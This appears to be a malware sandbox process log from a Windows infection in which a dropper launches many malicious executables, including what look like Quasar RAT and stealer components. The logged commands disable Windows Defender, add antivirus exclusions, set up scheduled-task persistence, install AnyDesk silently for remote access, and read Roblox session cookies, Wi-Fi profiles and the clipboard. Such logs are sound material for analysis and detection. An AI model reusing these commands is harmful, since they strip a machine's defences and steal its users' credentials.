C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\info.exe

"C:\Users\Admin\AppData\Local\Temp\a\info.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

reg delete "HKEY_USERS\.DEFAULT\SOFTWARE\TektonIT" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C regedit /s "%SystemDrive%\Windows\SysWOW64\ruts\11.reg

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Windows\SysWOW64\ruts\11.reg

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "%SystemDrive%\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /RU SYSTEM /TN "Microsoft\Windows\CertificateServicesClient\ruts" /TR "C:\Windows\SysWOW64\ruts\rutserv.exe" /sc onstart

C:\Users\Admin\AppData\Local\Temp\a\50.exe

"C:\Users\Admin\AppData\Local\Temp\a\50.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c delete.bat

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE


C:\Windows\SysWOW64\schtasks.exe

schtasks /run /TN "Microsoft\Windows\CertificateServicesClient\ruts"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\SH.exe

"C:\Users\Admin\AppData\Local\Temp\a\SH.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon

C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe

"C:\Users\Admin\AppData\Local\Temp\a\Systenn.exe"

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k WerSvcGroup

C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe

"C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\SysWOW64\ruts\rutserv.exe

C:\Windows\SysWOW64\ruts\rutserv.exe -run_agent -second

C:\Users\Admin\AppData\Local\Temp\a\qwex.exe

"C:\Users\Admin\AppData\Local\Temp\a\qwex.exe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Winlogoh.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\XW.exe

"C:\Users\Admin\AppData\Local\Temp\a\XW.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vorpgkadeg.exe"

C:\Users\Admin\AppData\Local\Temp\a\boleto.exe

"C:\Users\Admin\AppData\Local\Temp\a\boleto.exe"

C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe

"C:\Users\Admin\AppData\Local\Temp\a\piotjhjadkaw.exe"

C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\krgawdtyjawd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe

"C:\Users\Admin\AppData\Local\Temp\a\jdrgsotrti.exe"

C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisteruop.exe"

C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe

"C:\Users\Admin\AppData\Local\Temp\a\vovdawdrg.exe"

C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe

"C:\Users\Admin\AppData\Local\Temp\a\mfcthased.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe

"C:\Users\Admin\AppData\Local\Temp\a\kisloyat.exe"

C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe

"C:\Users\Admin\AppData\Local\Temp\a\daytjhasdawd.exe"

C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe

"C:\Users\Admin\AppData\Local\Temp\a\ScreenUpdateSync.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1324 -s 320

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "xda" /tr "C:\Users\Admin\AppData\Roaming\System32\xda.dll"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 608 -p 3520 -ip 3520

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3520 -s 2180

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\boleto.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe

"C:\Users\Admin\AppData\Local\Temp\a\vcredist_x86.exe"

C:\Windows\SysWOW64\msiexec.exe

msiexec /i vcredist.msi

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\XW.exe'

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "boleto" /tr "C:\Users\Admin\AppData\Roaming\boleto.exe"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k swprv

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XW.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\MicrosoftProfile.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MicrosoftProfile.exe'

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2324 -ip 2324

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1200

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "MicrosoftProfile" /tr "C:\Users\Admin\MicrosoftProfile.exe"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{bbdceaac-ed42-4d86-a1df-4449fb89d1a3}

C:\Windows\system32\srtasks.exe

C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 7D5ABB851EBB1EA598FA427462D75E36

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4820 -ip 4820

C:\Users\Admin\AppData\Local\Temp\a\jy.exe

"C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp

"C:\Users\Admin\AppData\Local\Temp\is-83LAL.tmp\jy.tmp" /SL5="$E01EA,1888137,52736,C:\Users\Admin\AppData\Local\Temp\a\jy.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4820 -s 1292

C:\Users\Admin\AppData\Local\Temp\a\test30.exe

"C:\Users\Admin\AppData\Local\Temp\a\test30.exe"

C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe

"C:\Users\Admin\AppData\Local\Temp\a\testingfile.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\Client.exe

"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "wod2" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\Client.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\Discord.exe

"C:\Users\Admin\AppData\Local\Temp\a\Discord.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe

"C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe"

C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe

"C:\Users\Admin\AppData\Local\Temp\a\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\SubDir\powerstealer.exe" /rl HIGHEST /f

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Local\Temp\a\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\a\Loader.exe"

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe

"C:\Users\Admin\AppData\Local\Temp\a\SigniantApp_Installer_1.5.1806.exe"

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantInstallhelper.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JpsXGIQt8bGP.bat" "

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe

"C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\SigniantApp_Installer.exe"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

C:\Windows\explorer.exe

explorer.exe

C:\Windows\explorer.exe

explorer.exe

C:\Windows\SYSTEM32\msiexec.exe

msiexec /i SigniantApp_Installer.msi /L*V ..\SigniantAppInstaller.log /qn+ REBOOT=ReallySuppress LAUNCHEDBY=fullExeInstall

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.0.1

C:\Windows\system32\PING.EXE

"C:\Windows\system32\PING.EXE" 127.1.10.1

C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe

"C:\Users\Admin\AppData\Local\Temp\a\wmfdist.exe"

C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe

"C:\Users\Admin\AppData\Local\Temp\a\KeePassRDP_v2.2.2.exe"

C:\Windows\system32\devtun\RuntimeBroker.exe

"C:\Windows\system32\devtun\RuntimeBroker.exe"

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "RuntimeBroker" /sc ONLOGON /tr "C:\Windows\system32\devtun\RuntimeBroker.exe" /rl HIGHEST /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DbsVCvDMFD4m.bat" "

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5128 -ip 5128

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5128 -s 1324

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Users\Admin\AppData\Local\Temp\a\leto.exe

"C:\Users\Admin\AppData\Local\Temp\a\leto.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y8B03.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1a51J4.exe

C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe

"C:\Users\Admin\AppData\Local\Temp\a\dxwebsetup.exe"

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dxwsetup.exe

C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe

"C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Y06E.exe

C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe

"C:\Users\Admin\AppData\Local\Temp\a\Itaxyhi.exe"

C:\Users\Admin\AppData\Local\Temp\a\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\a\laz.exe

"C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1336.tmp\1337.tmp\1338.bat C:\Users\Admin\AppData\Local\Temp\a\laz.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe"

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-service

C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe

"C:\Users\Admin\AppData\Local\Temp\a\AnyDesk.exe" --local-control

C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe

"C:\Users\Admin\AppData\Local\Temp\a\svchosts.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2972 -ip 2972

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 1268

C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe

"C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\64F0.tmp\64F1.tmp\64F2.bat C:\Users\Admin\AppData\Local\Temp\a\any_dsk.exe"

C:\Users\Admin\AppData\Roaming\AnyDesk.exe

C:\Users\Admin\AppData\Roaming\anydesk.exe --install "C:\Program Files (x86)\AnyDesk" --start-with-win --silent

C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe"

C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\5dismhost.exe"

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service

C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\4dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\6dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\System32\xda.dll

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\AppData\Roaming\boleto.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\MicrosoftProfile.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184

C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\2dismhost.exe"

C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe

"C:\Users\Admin\AppData\Local\Temp\a\3dismhost.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 404

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe

"C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe"

C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe

"C:\Users\Admin\AppData\Local\Temp\a\Complexo%20v4.exe"

C:\Users\Admin\AppData\Local\Temp\a\srtware.exe

"C:\Users\Admin\AppData\Local\Temp\a\srtware.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3184 -ip 3184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3184 -s 412

C:\Program Files (x86)\AnyDesk\AnyDesk.exe

"C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --control

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 6780 -ip 6780

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "start bound.exe"

C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe

"C:\Users\Admin\AppData\Local\Temp\a\AutoHotkeyU64.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 6780 -s 84

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "netsh wlan show profile"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "systeminfo"

C:\Windows\explorer.exe

explorer.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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"

C:\Users\Admin\AppData\Local\Temp\a\Setup.exe

"C:\Users\Admin\AppData\Local\Temp\a\Setup.exe"

C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe

"C:\Users\Admin\AppData\Local\Temp\a\APQSKVTvd60SdAM.exe"

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Users\Admin\AppData\Local\Temp\bound.exe

bound.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo L0ckB1tter3 "

C:\Windows\explorer.exe

explorer.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.0.1; del MicrosoftEdgeUpdateTaskMachineCoreSC.exe

C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'

\??\c:\Program Files (x86)\AnyDesk\AnyDesk.exe

"c:\Program Files (x86)\AnyDesk\anydesk.exe" --set-password

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend

C:\Users\Admin\AppData\Local\complacence\outvaunts.exe

"C:\Users\Admin\AppData\Local\Temp\a\HKP098767890HJ.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Xbest%20V1.exe'

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

"C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe" /RunAsService

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\netsh.exe

netsh wlan show profile

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe

"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Users\Admin\AppData\Local\Temp\a\AdvancedRun.exe

